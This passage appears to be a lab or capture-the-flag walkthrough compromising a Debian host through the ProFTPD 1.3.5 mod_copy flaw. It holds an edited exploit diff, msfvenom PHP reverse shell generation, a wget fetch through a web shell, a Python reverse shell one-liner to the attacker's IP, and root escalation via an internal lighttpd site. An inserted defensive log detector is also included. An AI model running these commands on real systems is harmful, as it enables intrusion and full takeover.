. 110 ProFTPD

Nmap
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

| ssh-hostkey:

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3825/tcp open ftp ProFTPD 1.3.5

8098/tcp open http Apache httpd 2.4.38 ((Debian))

|_http-title: Apache2 Debian Default Page: It works

|_http-server-header: Apache/2.4.38 (Debian)


Service Info: OS: Unix

:8098 directories
/level
/server-status

Discovery of /level/

Enumerate hidden paths with dirb.

dirb http://192.168.142.110:8098/

--> Testing: http://192.168.142.110:8098/level

==> DIRECTORY: http://192.168.142.110:8098/level/

Strangely, /level/ turned out to be an unavailable page.
ProFTPD 1.3.5 Exploits
Searching for a ProFTPD 1.3.5 exploit turns up a PoC for RCE, but it does not work well.
ProFTPd 1.3.5 - ‘mod_copy’ Remote Command Execution
https://www.exploit-db.com/exploits/36803
ProFTPd 1.3.5 - ‘mod_copy’ Remote Command Execution (2)
https://www.exploit-db.com/exploits/49908
Searching further turns up an even better PoC, but it does not work either.
ProFTPd 1.3.5 - (mod_copy) Remote Command Execution
https://github.com/t0kx/exploit-CVE-2015-3306
It seems that /var/www/html is not writable.
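As an added defensive example (not from the writeup or from either PoC's authors): a small detector that pairs each client's SITE CPFR with its following SITE CPTO in an FTP command log and flags copies that land under a web root or create a server-side script, which is the footprint that abuse of CVE-2015-3306 leaves on the server side. The log line format, the sample lines and the list of web roots are all constructed assumptions for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample FTP command log (not from the writeup's target); one line per
# command: "<date> <time> <client-ip> <FTP command> <argument>".
SAMPLE_LOG = """\
2024-05-01 10:00:01 192.0.2.5 USER anonymous
2024-05-01 10:00:01 192.0.2.5 PASS ******
2024-05-01 10:00:02 192.0.2.5 SITE CPFR /var/ftp/pub/notes.txt
2024-05-01 10:00:02 192.0.2.5 SITE CPTO /var/ftp/pub/notes_copy.txt
2024-05-01 10:00:05 198.51.100.9 SITE CPFR /tmp/.payload
2024-05-01 10:00:05 198.51.100.9 SITE CPTO /var/www/html/level/backdoor.php
2024-05-01 10:00:09 198.51.100.9 SITE CPFR /tmp/.payload
2024-05-01 10:00:09 198.51.100.9 SITE CPTO /var/www2/html/files/shell.php
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) SITE (CPFR|CPTO) (\S+)$", re.I)
WEB_ROOTS = ("/var/www",)                 # assumed document roots worth alerting on
SCRIPT_EXT = (".php", ".phtml", ".phar")  # extensions the web server would execute

@dataclass
class Finding:
    ts: str
    client: str
    src: str
    dst: str
    reason: str

def scan_mod_copy(log_text, web_roots=WEB_ROOTS):
    """Pair each client's SITE CPFR with its next SITE CPTO and flag copies whose
    destination is under a web root or is a server-side script."""
    pending = {}   # client ip -> source path of the last CPFR seen
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # not a SITE CPFR/CPTO command; ignore
        ts, client, verb, path = m.groups()
        if verb.upper() == "CPFR":
            pending[client] = path
            continue
        src = pending.pop(client, "<unknown>")
        reasons = []
        if path.startswith(web_roots):
            reasons.append("destination under web root")
        if path.lower().endswith(SCRIPT_EXT):
            reasons.append("destination is a server-side script")
        if reasons:
            findings.append(Finding(ts, client, src, path, "; ".join(reasons)))
    return findings
```

Run over a real ExtendedLog the only change needed is LINE_RE, since ProFTPD's log layout is whatever the server's configured format says.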


Here you recall the curious /level/ from earlier.

Edit PoC
Edit the PoC to target /var/www/html/level.

diff exploit.py exploit_new.py


33c33
< print("[+] Target exploited, acessing shell at http://" +
self.__host + "/backdoor.php")
---
> print("[+] Target exploited, acessing shell at http://" +
self.__host + ":8098/level/backdoor.php")
40c40
< data = requests.get("http://" + self.__host +
"/backdoor.php?cmd=whoami")
---
> data = requests.get("http://" + self.__host +
":8098/level/backdoor.php?cmd=whoami")

Drop php reverse shell

The web shell is inconvenient, so generate a PHP reverse shell on the attack machine and serve it from there.

msfvenom -p php/reverse_php LHOST=192.168.49.142 LPORT=4444 -f raw > shell.php
python -m SimpleHTTPServer 5555

On the victim machine, fetch it with wget through the web shell.


http://192.168.142.110:8098/level/backdoor.php?cmd=wget%20192.168.49.142:5555/shell.php

The php reverse shell has been dropped.


http://192.168.142.110:8098/level/shell.php

Requesting shell.php gives you a reverse shell.


Receive a reverse shell with nc.
nc -nvlp 4444

And you can get local.txt.


Discover the internal site


After the initial intrusion, reconnect on port 6666, since port 4444 may be needed for the root shell later.
export RHOST="192.168.49.142";export RPORT=6666;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
nc -nvlp 6666
Once connected, run linpeas.sh.
You can see that lighttpd is running as root.

In addition, there seems to be an internal site on ports 5000 and 3306.

Copy php reverse shell

Now that we know the internal site runs as root, can we place a PHP reverse shell there?
Luckily, /var/www2/ was spotted before even looking at the configuration file.
Inside are /files and /files/robots.txt; use curl to check whether they match what the site on port 5000 serves.

curl http://127.0.0.1:5000
<?xml version="1.0" encoding="iso-8859-1"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>403 Forbidden</title>
</head>
<body>
<h1>403 Forbidden</h1>

</body>
</html>
curl http://127.0.0.1:5000/files/robots.txt
User-agent: *
Disallow: /config.php
Disallow: /administration/
Disallow: /includes/

Disallow: /locale/
Disallow: /themes/
Disallow: /print.php

So there seems to be no mistake here.


This is where we copy the reverse shell.

cp /var/www/html/level/shell.php /var/www2/html/files/shell.php

Privilege Escalation

The php reverse shell has been copied.


curl http://127.0.0.1:5000/files/shell.php

Requesting it from the inside gives you a reverse "root" shell on nc.
nc -nvlp 4444

And you can get proof.txt.

